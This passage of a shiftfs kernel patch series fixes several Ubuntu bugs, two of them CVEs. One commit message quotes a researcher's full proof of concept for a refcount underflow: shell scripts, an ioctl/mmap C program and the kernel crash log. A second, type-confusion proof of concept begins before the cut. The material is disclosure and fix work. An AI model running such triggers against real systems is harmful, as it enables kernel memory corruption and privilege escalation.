+@@ -31,13 +31,6 @@ struct shiftfs_super_info {
+ 	unsigned int passthrough_mark;
+ };
+ 
+-struct shiftfs_file_info {
+-	struct path realpath;
+-	struct file *realfile;
+-};
+-
+-struct kmem_cache *shiftfs_file_info_cache;
+-
+ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
+ 			       umode_t mode, dev_t dev, struct dentry *dentry);
+ 
+@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = {
+ };
+ 
+ static struct file *shiftfs_open_realfile(const struct file *file,
+-					  struct path *realpath)
++					  struct inode *realinode)
+ {
+-	struct file *lowerf;
+-	const struct cred *oldcred;
++	struct file *realfile;
++	const struct cred *old_cred;
+ 	struct inode *inode = file_inode(file);
+-	struct inode *loweri = realpath->dentry->d_inode;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
+ 	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
+ 
+-	oldcred = shiftfs_override_creds(inode->i_sb);
+-	/* XXX: open_with_fake_path() not gauranteed to stay around, if
+-	 * removed use dentry_open() */
+-	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
+-	revert_creds(oldcred);
++	old_cred = shiftfs_override_creds(inode->i_sb);
++	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
++				       info->creator_cred);
++	revert_creds(old_cred);
+ 
+-	return lowerf;
++	return realfile;
+ }
+ 
+ #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
+@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
+ 
+ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	lowerfd->flags = 0;
+ 	lowerfd->file = realfile;
+@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ 
+ static int shiftfs_open(struct inode *inode, struct file *file)
+ {
+-	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
+-	struct shiftfs_file_info *file_info;
+ 	struct file *realfile;
+-	struct path *realpath;
+ 
+-	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
+-	if (!file_info)
+-		return -ENOMEM;
+-
+-	realpath = &file_info->realpath;
+-	realpath->mnt = ssi->mnt;
+-	realpath->dentry = file->f_path.dentry->d_fsdata;
+-
+-	realfile = shiftfs_open_realfile(file, realpath);
+-	if (IS_ERR(realfile)) {
+-		kmem_cache_free(shiftfs_file_info_cache, file_info);
++	realfile = shiftfs_open_realfile(file, inode->i_private);
++	if (IS_ERR(realfile))
+ 		return PTR_ERR(realfile);
+-	}
+ 
+-	file->private_data = file_info;
++	file->private_data = realfile;
+ 	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
+ 	file->f_mapping = realfile->f_mapping;
+ 
+-	file_info->realfile = realfile;
+ 	return 0;
+ }
+ 
+-static int shiftfs_release(struct inode *inode, struct file *file)
++static int shiftfs_dir_open(struct inode *inode, struct file *file)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile;
++	const struct cred *oldcred;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
++			       info->creator_cred);
++	revert_creds(oldcred);
++	if (IS_ERR(realfile))
++		return PTR_ERR(realfile);
+ 
+-	if (file_info) {
+-		if (file_info->realfile)
+-			fput(file_info->realfile);
++	file->private_data = realfile;
+ 
+-		kmem_cache_free(shiftfs_file_info_cache, file_info);
+-	}
++	return 0;
++}
++
++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct file *realfile = file->private_data;
++
++	if (realfile)
++		fput(realfile);
+ 
+ 	return 0;
+ }
+ 
++static int shiftfs_dir_release(struct inode *inode, struct file *file)
++{
++	return shiftfs_release(inode, file);
++}
++
+ static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	return vfs_llseek(realfile, offset, whence);
+ }
+@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
+ 
+ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 	const struct cred *oldcred;
+ 	int ret;
+ 
+@@ -1671,8 +1668,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
+ {
+ 	const struct cred *oldcred;
+ 	int err = -ENOTDIR;
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
+ 	err = iterate_dir(realfile, ctx);
+@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = {
+ };
+ 
+ const struct file_operations shiftfs_dir_operations = {
++	.open			= shiftfs_dir_open,
++	.release		= shiftfs_dir_release,
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.fsync			= shiftfs_fsync,
+ 	.iterate_shared		= shiftfs_iterate_shared,
+ 	.llseek			= shiftfs_dir_llseek,
+-	.open			= shiftfs_open,
+ 	.read			= generic_read_dir,
+-	.release		= shiftfs_release,
+ 	.unlocked_ioctl		= shiftfs_ioctl,
+ };
+ 
+@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = {
+ 
+ static int __init shiftfs_init(void)
+ {
+-	shiftfs_file_info_cache = kmem_cache_create(
+-		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
+-		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
+-	if (!shiftfs_file_info_cache)
+-		return -ENOMEM;
+-
+ 	return register_filesystem(&shiftfs_type);
+ }
+ 
+ static void __exit shiftfs_exit(void)
+ {
+ 	unregister_filesystem(&shiftfs_type);
+-	kmem_cache_destroy(shiftfs_file_info_cache);
+ }
+ 
+ MODULE_ALIAS_FS("shiftfs");
+-- 
+2.39.2
+
+From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Wed, 6 Nov 2019 09:38:57 -0600
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs
+ mmap fails
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850994
+
+shiftfs_mmap() overwrites vma->vm_file before calling the lower
+filesystem mmap but does not restore the original value on
+failure. This means it is giving a pointer to the lower fs file
+back to the caller with no reference, which is a bad practice.
+However, it does not lead to any issues with upstream kernels as
+no caller accesses vma->vm_file after call_mmap().
+
+With the aufs patches applied the story is different. Whereas
+mmap_region() previously fput a local variable containing the
+file it assigned to vm_file, it now calls vma_fput() which will
+fput vm_file, for which it has no reference, and the reference
+for the original vm_file is not put.
+
+Fix this by restoring vma->vm_file to the original value when the
+mmap call into the lower fs fails.
+
+CVE-2019-15794
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 15 +++++++++++----
+ 1 file changed, 11 insertions(+), 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 55bb32b611f2..57d84479026b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
+ 
+ 	shiftfs_file_accessed(file);
+ 
+-	if (ret)
+-		fput(realfile); /* Drop refcount from new vm_file value */
+-	else
+-		fput(file); /* Drop refcount from previous vm_file value */
++	if (ret) {
++		/*
++		 * Drop refcount from new vm_file value and restore original
++		 * vm_file value
++		 */
++		vma->vm_file = file;
++		fput(realfile);
++	} else {
++		/* Drop refcount from previous vm_file value */
++		fput(file);
++	}
+ 
+ 	return ret;
+ }
+-- 
+2.39.2
+
+From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:22:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1849482
+
+Set the s_maxbytes limit to MAX_LFS_FILESIZE.
+Currently shiftfs limits the maximum size for fallocate() needlessly
+causing calls such as fallocate --length 2GB ./file to fail. This
+limitation is arbitrary since it's not caused by the underlay but
+rather by shiftfs itself capping the s_maxbytes. This causes bugs such
+as the one reported in [1].
+
+[1]: https://github.com/lxc/lxd/issues/6333
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 57d84479026b..6a2b5e3d0d53 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	inode->i_private = dentry->d_inode;
+ 
+ 	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_maxbytes = MAX_LFS_FILESIZE;
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-- 
+2.39.2
+
+From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:23:50 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective
+ capabilities
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1849483
+
+Currently shiftfs allows to exceed project quota and reserved space on
+e.g. ext2. See [1] and especially [2] for a bug report. This is very
+much not what we want. Quotas and reserverd space settings set on the
+host need to respected. The cause for this issue is overriding the
+credentials with the superblock creator's credentials whenever we
+perform operations such as fallocate() or writes while retaining
+CAP_SYS_RESOURCE.
+
+The fix is to drop CAP_SYS_RESOURCE from the effective capability set
+after we have made a copy of the superblock creator's credential at
+superblock creation time. This very likely gives us more security than
+we had before and the regression potential seems limited. I would like
+to try this apporach first before coming up with something potentially
+more sophisticated. I don't see why CAP_SYS_RESOURCE should become a
+limiting factor in most use-cases.
+
+[1]: https://github.com/lxc/lxd/issues/6333
+[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 6a2b5e3d0d53..0d6ce377b07c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_flags |= SB_POSIXACL;
+ 
+ 	if (sbinfo->mark) {
++		struct cred *cred_tmp;
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
+ 		/* to mark a mount point, must root wrt lower s_user_ns */
+@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+-		sbinfo->creator_cred = prepare_creds();
+-		if (!sbinfo->creator_cred) {
++		cred_tmp = prepare_creds();
++		if (!cred_tmp) {
+ 			err = -ENOMEM;
+ 			goto out_put_path;
+ 		}
++		/* Don't override disk quota limits or use reserved space. */
++		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++		sbinfo->creator_cred = cred_tmp;
+ 	} else {
+ 		/*
+ 		 * This leg executes if we're admin capable in the namespace,
+-- 
+2.39.2
+
+From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 10:41:03 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl
+ handling
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
+file from the lower filesystem without taking an additional
+reference to that file. After the btrfs ioctl completes this fd
+is closed, which then puts a reference to that file, leading to a
+refcount underflow. Original bug report and test case from Jann
+Horn is below.
+
+Fix this, and at the sametime simplify the management of the fd
+to the lower file for the ioctl. In
+shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
+the lower file and set FDPUT_FPUT so that this reference will get
+dropped on fdput() in error paths. Do not maintain the struct fd
+in the caller, as it the fd installed in the fd table is
+sufficient to properly clean up. Finally, remove the fdput() in
+shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
+__close_fd() call.
+
+Original report from Jann Horn:
+
+In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
+
+ src = fdget(oldfd);
+ if (!src.file)
+  return -EINVAL;
+ // src holds one reference (assuming multithreaded execution)
+
+ ret = shiftfs_real_fdget(src.file, lfd);
+ // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
+ // extra references
+ fdput(src);
+ // this drops the only reference we were holding on src, and src was
+ // the only thing holding a reference to lfd->file. lfd->file may be
+ // dangling at this point.
+ if (ret)
+  return ret;
+
+ *newfd = get_unused_fd_flags(lfd->file->f_flags);
+ if (*newfd < 0) {
+  // always a no-op
+  fdput(*lfd);
+  return *newfd;
+ }
+
+ fd_install(*newfd, lfd->file);
+ // fd_install() consumes a counted reference, but we don't hold any
+ // counted references. so at this point, if lfd->file hasn't been freed
+ // yet, its refcount is one lower than it ought to be.
+
+ [...]
+
+ // the following code is refcount-neutral, so the refcount stays one too
+ // low.
+ if (ret)
+  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
+
+shiftfs_real_fdget() is implemented as follows:
+
+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+{
+ struct shiftfs_file_info *file_info = file->private_data;
+ struct file *realfile = file_info->realfile;
+
+ lowerfd->flags = 0;
+ lowerfd->file = realfile;
+
+ /* Did the flags change since open? */
+ if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+  return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+ return 0;
+}
+
+Therefore, the following PoC will cause reference count overdecrements; I ran it
+with SLUB debugging enabled and got the following splat:
+
+=======================================
+user@ubuntu1910vm:~/shiftfs$ cat run.sh
+sync
+unshare -mUr ./run2.sh
+t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
+set -e
+
+mkdir -p mnt/tmpfs
+mkdir -p mnt/shiftfs
+mount -t tmpfs none mnt/tmpfs
+mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+mount|grep shift
+touch mnt/tmpfs/foo
+gcc -o ioctl ioctl.c -Wall
+./ioctl
+user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
+
+int main(void) {
+  int root = open("mnt/shiftfs", O_RDONLY);
+  if (root == -1) err(1, "open shiftfs root");
+  int foofd = openat(root, "foo", O_RDONLY);
+  if (foofd == -1) err(1, "open foofd");
+  struct btrfs_ioctl_vol_args iocarg = {
+    .fd = foofd
+  };
+  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+  sleep(1);
+  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
+  if (map != MAP_FAILED) munmap(map, 0x1000);
+}
+user@ubuntu1910vm:~/shiftfs$ ./run.sh
+none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+[ 183.463452] general protection fault: 0000 [#1] SMP PTI
+[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[ 183.510580] Call Trace:
+[ 183.511396] mmap_region+0x417/0x670
+[ 183.512592] do_mmap+0x3a8/0x580
+[ 183.513655] vm_mmap_pgoff+0xcb/0x120
+[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
+[ 183.516155] __x64_sys_mmap+0x33/0x40
+[ 183.517352] do_syscall_64+0x5a/0x130
+[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
+[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
+[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
+[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
+[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
+[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
+[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
+[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
+[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
+[ 183.560350] ---[ end trace 4a860910803657c2 ]---
+[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+=======================================
+
+Disassembly of surrounding code:
+
+55 push rbp
+4889E5 mov rbp,rsp
+4157 push r15
+4156 push r14
+4155 push r13
+4154 push r12
+488B87C8000000 mov rax,[rdi+0xc8]
+4C8B6810 mov r13,[rax+0x10]
+498B4528 mov rax,[r13+0x28]
+4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
+0F8497000000 jz near 0xcc
+4989FC mov r12,rdi
+4989F6 mov r14,rsi
+
+This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
+think this corresponds to the load of "realfile->f_op->mmap" in the source code.
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15791
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 35 +++++++++++++++++++++--------------
+ 1 file changed, 21 insertions(+), 14 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 0d6ce377b07c..9a6a7ad50b90 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd)
+ 	return false;
+ }
+ 
+-static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+-					  void __user *arg,
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args *v1,
+ 					  struct btrfs_ioctl_vol_args_v2 *v2)
+ {
+@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ 	else
+ 		ret = copy_to_user(arg, v2, sizeof(*v2));
+ 
+-	fdput(lfd);
+ 	__close_fd(current->files, fd);
+ 	kfree(v1);
+ 	kfree(v2);
+@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args **b1,
+ 					  struct btrfs_ioctl_vol_args_v2 **b2,
+-					  struct fd *lfd,
+ 					  int *newfd)
+ {
+ 	int oldfd, ret;
+ 	struct fd src;
++	struct fd lfd = {};
+ 	struct btrfs_ioctl_vol_args *v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
+ 
+@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	if (!src.file)
+ 		return -EINVAL;
+ 
+-	ret = shiftfs_real_fdget(src.file, lfd);
+-	fdput(src);
+-	if (ret)
++	ret = shiftfs_real_fdget(src.file, &lfd);
++	if (ret) {
++		fdput(src);
+ 		return ret;
++	}
++
++	/*
++	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
++	 * take a reference here to offset the one which will be put by
++	 * __close_fd(), and make sure that reference is put on fdput(lfd).
++	 */
++	get_file(lfd.file);
++	lfd.flags |= FDPUT_FPUT;
++	fdput(src);
+ 
+-	*newfd = get_unused_fd_flags(lfd->file->f_flags);
++	*newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	if (*newfd < 0) {
+-		fdput(*lfd);
++		fdput(lfd);
+ 		return *newfd;
+ 	}
+ 
+-	fd_install(*newfd, lfd->file);
++	fd_install(*newfd, lfd.file);
+ 
+ 	if (cmd == BTRFS_IOC_SNAP_CREATE) {
+ 		v1->fd = *newfd;
+@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	}
+ 
+ 	if (ret)
+-		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
+ 
+ 	return ret;
+ }
+@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	int newfd = -EBADF;
+ 	long err = 0, ret = 0;
+ 	void __user *argp = (void __user *)arg;
+-	struct fd btrfs_lfd = {};
+ 	struct super_block *sb = file->f_path.dentry->d_sb;
+ 	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
+ 
+ 	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
+-					     &btrfs_lfd, &newfd);
++					     &newfd);
+ 	if (ret < 0)
+ 		return ret;
+ 
+@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	fdput(lowerfd);
+ 
+ out_restore:
+-	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
+ 					     btrfs_v1, btrfs_v2);
+ 	if (!ret)
+ 		ret = err;
+-- 
+2.39.2
+
+From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 1 Nov 2019 14:19:16 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Verify filesystem type in shiftfs_real_fdget().
+
+Quoting Jann Horn:
+ #################### Bug 2: Type confusion ####################
+
+ shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
+ passes the resulting file* into shiftfs_real_fdget(), which does this:
+
+ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ {
+  struct shiftfs_file_info *file_info = file->private_data;
+  struct file *realfile = file_info->realfile;
+
+  lowerfd->flags = 0;
+  lowerfd->file = realfile;
+
+  /* Did the flags change since open? */
+  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+   return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+  return 0;
+ }
+
+ file->private_data is a void* that points to a filesystem-dependent type; and
+ some filesystems even use it to store a type-cast number instead of a pointer.
+ The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
+
+ As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
+ (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
+ offset 0x10), and I use that to cause a memory dereference somewhere around
+ 0x4242:
+
+ =======================================
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
+ #!/bin/sh
+ sync
+ unshare -mUr ./run2.sh
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
+ #!/bin/sh
+ set -e
+
+ mkdir -p mnt/tmpfs
+ mkdir -p mnt/shiftfs
+ mount -t tmpfs none mnt/tmpfs
+ mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+ mount|grep shift
+ gcc -o ioctl ioctl.c -Wall
+ ./ioctl
